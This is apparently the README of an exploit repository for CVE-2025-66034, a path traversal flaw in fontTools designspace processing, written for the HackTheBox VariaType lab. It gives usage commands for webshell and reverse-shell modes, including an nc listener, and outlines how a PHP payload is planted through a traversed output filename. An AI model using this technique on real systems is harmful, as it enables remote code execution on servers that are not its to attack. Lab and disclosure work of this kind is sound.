d0x-awrqxavc/CVE-2025-66034

# CVE-2025-66034 - VariaType HTB 漏洞利用 fontTools designspace 处理中的路径遍历漏洞。允许通过 `.designspace` XML 文件中的 `variable-font filename` 属性写入任意文件。 **安全公告:** [GHSA-768j-98cg-p3fv](https://github.com/advisories/GHSA-768j-98cg-p3fv) ## 环境要求 ``` pip install fonttools requests ``` ## 用法 ### Webshell (交互式) ``` python3 CVE-2025-66034.py http://variatype.htb ``` ### 反向 Shell ``` # 终端 1 - listener nc -lvnp 443 # 终端 2 - exploit python3 CVE-2025-66034.py http://variatype.htb --mode revshell --lhost 10.10.14.208 --lport 443 ``` ## 选项 | 标志 | 描述 | 默认值 | |------|-------------|---------| | `url` | 目标 URL | (必填) | | `-p, --port` | 目标端口 | 80 | | `--mode` | `webshell` 或 `revshell` | webshell | | `--lhost` | 您的 IP (反向 shell) | - | | `--lport` | 您的端口 (反向 shell) | - | ## 工作原理 1. 构建两个最小的 TTF 字体，并在 `familyName` 字段中嵌入 PHP payload 2. 编造一个 `.designspace` XML，在 `variable-font filename` 属性中包含路径遍历 3. 上传到目标的可变字体生成器端点 4. fontTools 处理 designspace 并将输出（包含 PHP payload）写入遍历路径 5. 通过 GET 请求触发已部署的 PHP shell ## /etc/hosts ``` variatype.htb portal.variatype.htb ```

标签：CISA项目, CVE-2025-66034, fontTools, HackTheBox, OpenVAS, PHP, Python, Webshell, XML处理, 代码执行, 任意文件写入, 反弹Shell, 字体安全, 文件上传漏洞, 无后门, 网络信息收集, 网络安全, 路径遍历, 逆向工具, 隐私保护